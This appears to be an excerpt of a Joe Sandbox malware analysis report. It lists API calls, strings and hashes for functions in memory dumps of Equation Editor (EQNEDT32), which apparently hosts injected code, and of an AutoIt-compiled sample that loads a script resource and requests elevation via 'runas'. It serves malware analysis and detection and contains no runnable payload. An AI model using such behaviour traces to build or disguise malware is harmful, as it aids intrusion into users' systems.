Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
Instruction ID: 3db8ff203191e3e63422eec0be7a3c2528f7d4a28e40121cc7082381baa8256a
Opcode Fuzzy Hash: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
Instruction Fuzzy Hash: 0BF0F671008346AFD712DE54DC41F6FBAAAFBC5B40F048E1DB1948A0F1D77299188AA2

Uniqueness

Uniqueness Score: -1.00%

Function 0350045F Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0350047C

Part of subcall function 03500496: LoadLibraryW.KERNEL32(03500486), ref: 03500496

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateFileLibraryLoad
String ID:
API String ID: 2049390123-0
Opcode ID: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
Instruction ID: 2adc71b2a95f19d0e95f35495634d00a4b949c19b1ea06e54617cd84c8522461
Opcode Fuzzy Hash: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
Instruction Fuzzy Hash: E1E012745483803AD531D7305D5AF99AE643F81B04F09C999A3C89F1E3D6B250058229

Uniqueness

Uniqueness Score: -1.00%

Function 035006BC Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

ExitProcess.KERNELBASE(00000000,?,035006B0,?,03500694,?,03500657,?,?,0350063E,00000000,00000000,00000000,00000000,035004DC,00000050), ref: 035006C1

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 035006C3 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: 0c1e8f26191b028feb2e96089c45d16e2307b3e4b0d136f96d5eaa2098818edf
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: 92D01C31202A029BC204DB04DA80A1AF36AFBC8210B28C269E4004B6A9C330E8A2CA90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: YED.exePID: 652, Parent PID: 800COMMON

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.3%
Total number of Nodes:	1935
Total number of Limit Nodes:	70

Executed Functions

Function 002142DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0021430D

Part of subcall function 00216B57: _wcslen.LIBCMT ref: 00216B6A

GetCurrentProcess.KERNEL32(?,002ACB64,00000000,?,?), ref: 00214422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00214429
LoadLibraryA.KERNEL32(kernel32.dll), ref: 00214454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 00214466
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00214474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0021447B
GetSystemInfo.KERNEL32(?,?,?), ref: 002144A0

Strings

kernel32.dll, xrefs: 0021444F
GetNativeSystemInfo, xrefs: 00214460
|O, xrefs: 002536F8

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 8bff81ab9414dd8875c4cf462b3f75a2591af8c6a2b7923b04f446a2dd2a0be3
Instruction ID: 68e9de9a00776e5683bff418f55ec1745a0901f8ad5a6a8aa30c3b74dcd6255e
Opcode Fuzzy Hash: 8bff81ab9414dd8875c4cf462b3f75a2591af8c6a2b7923b04f446a2dd2a0be3
Instruction Fuzzy Hash: 34A103729AA2C0CFCB11DB697CCC1D87FE46B36740B1858F8E4459BA62D27049B8CB35

Uniqueness

Uniqueness Score: -1.00%

Function 002142A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 002142B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002150AA,?,?,00000000,00000000), ref: 002142C9
LoadResource.KERNEL32(?,00000000,?,?,002150AA,?,?,00000000,00000000,?,?,?,?,?,?,00214F20), ref: 002535BE
SizeofResource.KERNEL32(?,00000000,?,?,002150AA,?,?,00000000,00000000,?,?,?,?,?,?,00214F20), ref: 002535D3
LockResource.KERNEL32(002150AA,?,?,002150AA,?,?,00000000,00000000,?,?,?,?,?,?,00214F20,?), ref: 002535E6

Strings

SCRIPT, xrefs: 002142BF

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 3c3a007a9d82a40ae2ecdb9468dd287d658f4ff1312721fb95e47641610dff6a
Instruction ID: 4c6772e0a01112904648ddf7c5ed991810e88c3e49dd5a0d78ceed3861e3b646
Opcode Fuzzy Hash: 3c3a007a9d82a40ae2ecdb9468dd287d658f4ff1312721fb95e47641610dff6a
Instruction Fuzzy Hash: E1117C70210701BFE7219F65EC48F677BBAEBD6B51F20416AB80696250DF72D8508620

Uniqueness

Uniqueness Score: -1.00%

Function 00252BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00212B6B

Part of subcall function 00213A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002E1418,?,00212E7F,?,?,?,00000000), ref: 00213A78

Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD

GetForegroundWindow.USER32 ref: 00252C10
ShellExecuteW.SHELL32(00000000,?,?,002D2224), ref: 00252C17

Strings

runas, xrefs: 00252C0B

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 583111f37846ff325ce6285d08fad523fee4efcb6a0b27068312fa717ca6b0b4
Instruction ID: 74a5920e7b16435ce212562375f0048da29b7add1e8c207240f1e22e3f4fc463
Opcode Fuzzy Hash: 583111f37846ff325ce6285d08fad523fee4efcb6a0b27068312fa717ca6b0b4
Instruction Fuzzy Hash: 8511D2312283459AC704FF20E855AEEB7E99BB6314F44042EB182121A2CF709AFD8B52

Uniqueness

Uniqueness Score: -1.00%

Function 0027DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00255222), ref: 0027DBCE
GetFileAttributesW.KERNEL32(?), ref: 0027DBDD
FindFirstFileW.KERNEL32(?,?), ref: 0027DBEE
FindClose.KERNEL32(00000000), ref: 0027DBFA

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: d50cf9d9a4fe128cbc04b4fa34061f538d8182da2342d906374d3719878cfdbe
Instruction ID: 6a4f542907c364cb615c4039386603e1615a41298cb9ea2bdbac143ecb656bf0
Opcode Fuzzy Hash: d50cf9d9a4fe128cbc04b4fa34061f538d8182da2342d906374d3719878cfdbe
Instruction Fuzzy Hash: 45F0E5308209105782216F7CBC0D8AA37BC9E02334BA0870BF83AC20F0EFB05D64C6D5

Uniqueness

Uniqueness Score: -1.00%

Function 0024333F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0023E505), ref: 0024337E

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00243350, 0024335A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime
API String ID: 2086374402-595813830
Opcode ID: 4146428ce496928a518f3ed8b11a22382ce42625d5f4061f5c01ca06006d3080
Instruction ID: ef715247065ee6eb2dd3d764c8a1c627c6b85988837e9d73628ebdc5c4f32e96
Opcode Fuzzy Hash: 4146428ce496928a518f3ed8b11a22382ce42625d5f4061f5c01ca06006d3080
Instruction Fuzzy Hash: F4E0A330B20304EBC314AF54AC06D7EBF90DF02B80B500199FC0587740CD300D2096D5

Uniqueness

Uniqueness Score: -1.00%

Function 0021BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

p#., xrefs: 002607CE

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: BuffCharUpper
String ID: p#.
API String ID: 3964851224-3385838572
Opcode ID: 73fe3a9e3308371922b0b8de00ca04f7f2698c982ddb7743629c4c696d29f1bc
Instruction ID: d3eed617f1dad90ca229d7e4e65ad672f0cec6183a3d5deab3b21966c7fa4ca7
Opcode Fuzzy Hash: 73fe3a9e3308371922b0b8de00ca04f7f2698c982ddb7743629c4c696d29f1bc
Instruction Fuzzy Hash: 71A279746283419FD714CF24C480B6AB7E1BF99304F24896DE89A8B352D771ECA5CF92

Uniqueness

Uniqueness Score: -1.00%

Function 002309D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 002309DA

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ca02e44bc7d7eb8a85ddb4d5f7d139ac9f1d1ba55452736ccf3f90e736b90aee
Instruction ID: 05a9182b52d48c61eb8be5851d042debc891f78779f7f5dd471cd548cea9368e
Opcode Fuzzy Hash: ca02e44bc7d7eb8a85ddb4d5f7d139ac9f1d1ba55452736ccf3f90e736b90aee
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0021D730 Relevance: 21.6, APIs: 14, Instructions: 624windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0021D807
timeGetTime.WINMM ref: 0021DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0021DB28
TranslateMessage.USER32(?), ref: 0021DB7B
DispatchMessageW.USER32(?), ref: 0021DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0021DB9F
Sleep.KERNEL32(0000000A), ref: 0021DBB1

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: c3ee4b571c53519d48993cfcf41eea7a9e01bc77899d1214d976597debf0e2da
Instruction ID: a206443a3d4ab2e7828e1aaf01771210fd04037baf12e35386840df738cda6ca
Opcode Fuzzy Hash: c3ee4b571c53519d48993cfcf41eea7a9e01bc77899d1214d976597debf0e2da
Instruction Fuzzy Hash: 4B42F430628742DFD729CF24C888BAAB7E4BF55304F14455DE4968B291D7B4E8E8CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00212CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 00212D07
RegisterClassExW.USER32(00000030), ref: 00212D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00212D42
InitCommonControlsEx.COMCTL32(?), ref: 00212D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00212D6F
LoadIconW.USER32 ref: 00212D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00212D94

Strings

AutoIt v3 GUI, xrefs: 00212D23
TaskbarCreated, xrefs: 00212D37
0, xrefs: 00212CE9
+, xrefs: 00212CF0

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 24a3af4d6f0f9da16408cfe15e6fdc7eec3952081f5bd4802dc2bcbca6a7b1a9
Instruction ID: 5823bec68cf755554668ad8dc071430e82fff3e1ff8f9d91a4fc792db9fcca21
Opcode Fuzzy Hash: 24a3af4d6f0f9da16408cfe15e6fdc7eec3952081f5bd4802dc2bcbca6a7b1a9
Instruction Fuzzy Hash: C421B4B5951258AFDB00DFA4FC89BDDBBB8FB09700F10412AE511AA2A0DBB545548F91

Uniqueness

Uniqueness Score: -1.00%

Function 00248D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.#, xrefs: 0024903A, 00248FD0, 00248FF2

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID: .#
API String ID: 0-197210044
Opcode ID: 6daee3ab1577046091fa0903c978da530885ed3ee060dc90a402784c5e251f4e
Instruction ID: 84d275f23f04297cff4e112efcc1bb86661948abcfe6574703031cb7e518a98c
Opcode Fuzzy Hash: 6daee3ab1577046091fa0903c978da530885ed3ee060dc90a402784c5e251f4e
Instruction Fuzzy Hash: A3C10874D24249DFDF19DFA8D885BAEBBB0AF09310F144195F814AB392CB7089A1CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0025065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0025039A: CreateFileW.KERNEL32(00000000,00000000,?,00250704,?,?,00000000), ref: 002503B7

GetLastError.KERNEL32 ref: 0025076F
__dosmaperr.LIBCMT ref: 00250776
GetFileType.KERNEL32 ref: 00250782
GetLastError.KERNEL32 ref: 0025078C
__dosmaperr.LIBCMT ref: 00250795
CloseHandle.KERNEL32(00000000), ref: 002507B5
CloseHandle.KERNEL32(?), ref: 002508FF
GetLastError.KERNEL32 ref: 00250931
__dosmaperr.LIBCMT ref: 00250938

Strings

H, xrefs: 002508BD

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 2a0e1a1ecbbe2bf190547002b9d1cdd371920f28310cb10ee78ac247e6450a24
Instruction ID: 136cc8579d319c3c2704e33a553655abfc9a2bcdab72d88c5a02bbb4b61934fa
Opcode Fuzzy Hash: 2a0e1a1ecbbe2bf190547002b9d1cdd371920f28310cb10ee78ac247e6450a24
Instruction Fuzzy Hash: 73A15732A201058FDF19AF68ECD5BAE7BA0AB06321F140159FC159F391CB309C27CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0021344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00213A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002E1418,?,00212E7F,?,?,?,00000000), ref: 00213A78

Part of subcall function 00213357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00213379

RegOpenKeyExW.KERNEL32 ref: 0021356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0025318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 002531CE
RegCloseKey.ADVAPI32(?), ref: 00253210
_wcslen.LIBCMT ref: 00253277
_wcslen.LIBCMT ref: 00253286

Strings

Include, xrefs: 00253184, 002531C5
Software\AutoIt v3\AutoIt, xrefs: 00213560
\, xrefs: 0025328C
\Include\, xrefs: 00213527

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 2b00b51c54e40bec83f4ac84b877c31502127023776e89d71881f0829a7b444a
Instruction ID: 44921d6cc36a0688bde9f6072997bca40cfc4684e654de199ecbc8b724ecdc79
Opcode Fuzzy Hash: 2b00b51c54e40bec83f4ac84b877c31502127023776e89d71881f0829a7b444a
Instruction Fuzzy Hash: 03717C71464341DEC314EF65EC869ABBBE8FF95340F40046EF94697160EB709A98CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00212B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 00212B8E
LoadCursorW.USER32 ref: 00212B9D
LoadIconW.USER32 ref: 00212BB3
LoadIconW.USER32 ref: 00212BC5
LoadIconW.USER32 ref: 00212BD7
LoadImageW.USER32 ref: 00212BEF
RegisterClassExW.USER32(?), ref: 00212C40

Part of subcall function 00212CD4: GetSysColorBrush.USER32 ref: 00212D07
Part of subcall function 00212CD4: RegisterClassExW.USER32(00000030), ref: 00212D31
Part of subcall function 00212CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00212D42
Part of subcall function 00212CD4: InitCommonControlsEx.COMCTL32(?), ref: 00212D5F
Part of subcall function 00212CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00212D6F
Part of subcall function 00212CD4: LoadIconW.USER32 ref: 00212D85
Part of subcall function 00212CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00212D94

Strings

AutoIt v3, xrefs: 00212C2F
0, xrefs: 00212C0F
#, xrefs: 00212C16

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 387310914000a3554992066173608bf09ce5dbba6a35befa13b671e4a6694a63
Instruction ID: 22a79f6a61331cee4103f334d4b4d8cc9e728f7cded628fd2b947214ff8bbf1b
Opcode Fuzzy Hash: 387310914000a3554992066173608bf09ce5dbba6a35befa13b671e4a6694a63
